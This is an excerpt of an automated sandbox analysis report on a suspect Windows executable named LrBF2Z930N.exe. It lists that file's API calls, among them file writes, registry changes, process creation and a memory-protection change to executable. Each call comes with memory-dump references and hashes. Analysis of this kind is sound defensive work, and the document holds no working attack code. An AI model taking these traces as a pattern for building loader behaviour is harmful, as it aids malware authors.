                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                                                      • Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
                                                                                      • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                                                      • Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\LrBF2Z930N.exe,80000000,00000003), ref: 00406176
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                      • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                                                      • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                      • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                                                      • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C44
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                                      • Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
                                                                                      • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                                      • Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4
                                                                                        • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 327478801-0
                                                                                      • Opcode ID: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
                                                                                      • Instruction ID: a9a910f18d9475f192186a99a32baa3f0737176f8f71227260f04108cb8f5765
                                                                                      • Opcode Fuzzy Hash: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
                                                                                      • Instruction Fuzzy Hash: CEE06D71A04108BFDB01ABA5BE499AEB3B9EB44354B20483FF102B00C8CA784D119A2D
                                                                                      APIs
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                                      • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                                                      • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                                      • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 00406546
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                      • Instruction ID: eb898ae1b777051f051c4ab58df26dcf4e878c8f9f4a5c47b005eb973d4bb03b
                                                                                      • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                      • Instruction Fuzzy Hash: 75E0E6B2010109BEEF095F50EC0AD7F371DE708710F11452EF906D4051E6B5E9309A39
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,0040F4A1,0040CEF0,0040357E,0040CEF0,0040F4A1,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                      • Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
                                                                                      • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                      • Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                      • Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
                                                                                      • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                      • Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(6E39505C,00000004,00000040,6E39504C), ref: 6E392A9D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3424771390.000000006E391000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E390000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3422340994.000000006E390000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429717707.000000006E394000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429758599.000000006E396000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6e390000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 16436fc4fcb4169320d84101f00f8516b95b9c80d689e98119dc0a21980d28d8
                                                                                      • Instruction ID: d971fb9c3a25082511e3a36356cf02d22ff213ab8be889be23e3a9710dfcc3a9
                                                                                      • Opcode Fuzzy Hash: 16436fc4fcb4169320d84101f00f8516b95b9c80d689e98119dc0a21980d28d8
                                                                                      • Instruction Fuzzy Hash: D4F0AEF0905A80FECB90DF6A84457093FE8B70A307B2445EAE188DA344F33644C6EBB1
                                                                                      APIs
                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString
                                                                                      • String ID:
                                                                                      • API String ID: 1096422788-0
                                                                                      • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                      • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                                                      • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                      • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00421F28,00000000,00000000,?,?,00000000,?,0040657D,?,00421F28,?,?,Call,?,00000000), ref: 00406513
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                      • Instruction ID: 600eba3f25fec8fd2e0e76c9bf818d2d921b30b98e1649e5cb913c6f6c6f8cb9
                                                                                      • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                      • Instruction Fuzzy Hash: 4DD0123600020DBBDF115E90ED01FAB3B5DAB08714F014826FE06A4091D775D530AB59
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                      • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                      • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                      • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 6E392C57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3424771390.000000006E391000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E390000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3422340994.000000006E390000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429717707.000000006E394000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429758599.000000006E396000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6e390000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: db9710c6adf415b51ef64b1fbb6f7d8c95d1c615ff599f33c90bd0cc38c83880
                                                                                      • Instruction ID: 5e3977323375ab88d43f3abaec3bfe95a5b637b902af3092fa0e8e32e01129db
                                                                                      • Opcode Fuzzy Hash: db9710c6adf415b51ef64b1fbb6f7d8c95d1c615ff599f33c90bd0cc38c83880
                                                                                      • Instruction Fuzzy Hash: 254161B2504E04AFDF149FE5EA45B9937FCFB4635AF308865E4058B210F7369481EBA1
                                                                                      APIs
                                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                                        • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                                        • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                                        • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                                        • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                                        • Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B32
                                                                                        • Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54
                                                                                        • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2972824698-0
                                                                                      • Opcode ID: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
                                                                                      • Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
                                                                                      • Opcode Fuzzy Hash: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
                                                                                      • Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNELBASE(00000040,?,6E3912DB,?,6E39137F,00000019,6E3911CA,-000000A0), ref: 6E3912C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3424771390.000000006E391000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E390000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3422340994.000000006E390000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429717707.000000006E394000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429758599.000000006E396000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6e390000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 3761449716-0
